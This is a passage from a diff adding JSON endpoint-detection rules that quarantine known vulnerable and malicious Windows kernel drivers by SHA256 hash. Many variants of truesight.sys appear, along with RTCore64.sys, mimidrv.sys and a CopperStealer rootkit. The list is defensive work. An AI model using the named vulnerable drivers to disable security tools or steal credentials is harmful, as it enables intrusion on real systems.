"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831756Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a348c4ac61303db7a1dbab06c95e56abbcd947d394dce5e2316232ce58b22bd9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"eeb994b3-e138-5e6a-aecc-8176cc25b143", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977514Z", + "creation_date": "2026-03-23T11:45:29.977516Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977521Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5fad3775feb8b6f6dcbd1642ae6b6a565ff7b64eadfc9bf9777918b51696ab36", + "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "eec9b3ec-9b5b-560c-a8f6-05a9aa396028", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973059Z", + "creation_date": "2026-03-23T11:45:29.973061Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.973067Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c8eaa5e6d3230b93c126d2d58e32409e4aeeb23ccf0dd047a17f1ef552f92fe9", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "eed73264-cbbb-5a19-8ef9-ecae7481d090", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981670Z", + "creation_date": "2026-03-23T11:45:29.981674Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981683Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f8886a9c759e0426e08d55e410b02c5b05af3c287b15970175e4874316ffaf13", + "comment": "Vulnerable Kernel Driver (aka netflt.sys) [https://www.loldrivers.io/drivers/35a9afeb-18f1-4c02-a3aa-830e300138ae/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "eed909b5-6a82-53cd-a387-c62d67abc935", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488621Z", + "creation_date": "2026-03-23T11:45:31.488623Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488629Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a7a95440a117482379be31db69537776dbc52c0128e89d9684aaa65e13190713", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "eeee10ba-db56-5871-b08d-68b2b2cb4b96", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977278Z", + "creation_date": "2026-03-23T11:45:29.977280Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977286Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"37a1a3fa4dc148924c1bfb60c88ffef082ee58cd0ee804d2de0f1d22c1e7802c", + "comment": "Malicious CopperStealer Rootkit (aka windbg.sys) [https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "eef8e40f-78f7-572e-85d2-eda0ac8e0695", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156655Z", + "creation_date": "2026-03-23T11:45:31.156657Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156662Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c6331505edd1014cc52161204024e2abca62b87158666db06c8524508402a7a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ef0290d0-3329-566b-aeaa-61e94c4d0768", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824348Z", + "creation_date": "2026-03-23T11:45:31.824351Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824360Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a1921a4cf383b837935c4108ce3369680b097cfc1b05e685e26d53f8bce22c0d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ef0b5f79-66a4-5adf-b74d-71a281deee4f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148434Z", + "creation_date": "2026-03-23T11:45:31.148435Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148441Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b19a70942d8a2712416840edb13c6efd0ba483fa62e68496ea437ced7b9519dd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ef111985-c75f-5ada-bc6a-07dcb46fbdb2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978336Z", + "creation_date": "2026-03-23T11:45:29.978338Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978343Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3f55375fb70cb355fe7de7f59904b12ef996447cbc7113fefa379995e040d678", + "comment": "Malicious Kernel Driver (aka wantd_4.sys) [https://www.loldrivers.io/drivers/72637cb1-5ca2-4ad0-a5df-20da17b231b5/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ef11a8dc-0bc9-5b08-a7c8-a7a85ae901e9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808432Z", + "creation_date": "2026-03-23T11:45:31.808434Z", 
+ "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808440Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5319f51a82e9725a01e7c6c00bab47a6223aa2b5e36ea39428225ee06cf06247", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ef1c56ab-e16f-5204-a51d-8029bd4bc19c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807351Z", + "creation_date": "2026-03-23T11:45:31.807353Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807359Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3bd87b14bf7ea7b946b02aab0f20947ffa672219bfb1683bb2cc8a537978e121", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"ef3bc8fd-d979-5543-ab4d-ea5b12285673", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978686Z", + "creation_date": "2026-03-23T11:45:29.978688Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978693Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b9623da9ba8e5c80c49473f40ffe7ad315dcadffc3230afdc9d9226d60a715a", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ef40c6b9-422b-5ac6-b5fa-94ed9300a78b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615798Z", + "creation_date": "2026-03-23T11:45:29.615800Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.615806Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "826e80ea5f657c75127c066b86caea8089f33b09b12c3d393fca8efedd40c1ef", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ef55c5dd-d7aa-59db-82b2-e98e93056af0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456018Z", + "creation_date": "2026-03-23T11:45:30.456022Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456031Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c191c7d4ec03c4ef0f51a67af42a90390f75ebd6f83dbc05e317fe5a90a1fb31", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ef57c6b0-6e84-54a9-a434-f431fbf641f8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492556Z", + "creation_date": "2026-03-23T11:45:31.492558Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492564Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "210b908936b7bcd3883c3e5b8924fdce25cba194f042e973125205307880af06", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ef63870b-2700-583e-951d-5a7214d58905", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608705Z", + "creation_date": "2026-03-23T11:45:29.608707Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608712Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"8ff48482c844ad0ab51365b9286197bc3c3173f02d62fc7ded68fc2b299b448b", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ef6a0c1b-977e-5c3a-a7ca-b6add94c0eed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144018Z", + "creation_date": "2026-03-23T11:45:32.144020Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144026Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "77cb09dc2fc3c56f3b12ad03a85cedbe3a8e0bb876dadfd76a1fb6c57602817b", + "comment": "Malicious Kernel Driver (aka driver_090d409f.sys) [https://www.loldrivers.io/drivers/00561455-9da1-4f0c-8564-e4c99b716a74/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ef6b9b15-a457-5b5b-843e-1e9ca9540352", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160047Z", + "creation_date": "2026-03-23T11:45:31.160049Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160054Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "111a37b0a0fbb135ad69da789e5ea53985c444dd0d6f91713c6bdd0d1060524c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ef719e5e-f04f-51f3-8c70-1ad369707863", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489109Z", + "creation_date": "2026-03-23T11:45:31.489111Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489116Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "77e344edd8e09c77c87843e37de9a5f286a1db3d41f8593bc970efa7a2a0433d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ef71cb45-3dc1-5ba4-b99a-03796755eb52", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985063Z", + "creation_date": "2026-03-23T11:45:29.985065Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985071Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f5215f83138901ca7ade60c2222446fa3dd7e8900a745bd339f8a596cb29356c", + "comment": "Dangerous Physmem Kernel Driver (aka Dh_Kernel.Sys) [https://www.loldrivers.io/drivers/dfce8b0f-d857-4808-80ef-61273c7a4183/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ef785546-217b-55f6-b8ef-e431343e35e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494710Z", + "creation_date": "2026-03-23T11:45:31.494712Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494718Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "da2330df96145c6bafe1563867de202570112737ea27da2e43bb4ec11e66db25", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ef79d680-d697-54d1-85f1-cb2b858b5ef8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460579Z", + "creation_date": "2026-03-23T11:45:30.460583Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460592Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c425793a8ce87be916969d6d7e9dd0687b181565c3b483ce53ad1ec6fb72a17", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ef7f376d-04eb-5cdb-823c-c923c15db51d", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469369Z", + "creation_date": "2026-03-23T11:45:30.469372Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469381Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fde2df81ad28f2306a2daf636041eb747a035d8f08709cdac2d53987d9edef4a", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ef862a0c-d4d2-5882-a33e-4fcbb2db018a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155241Z", + "creation_date": "2026-03-23T11:45:31.155243Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155248Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, 
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14c2cc0a314f51750e274f339c057b88509ec0ff996d1ba13d19317834848019",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
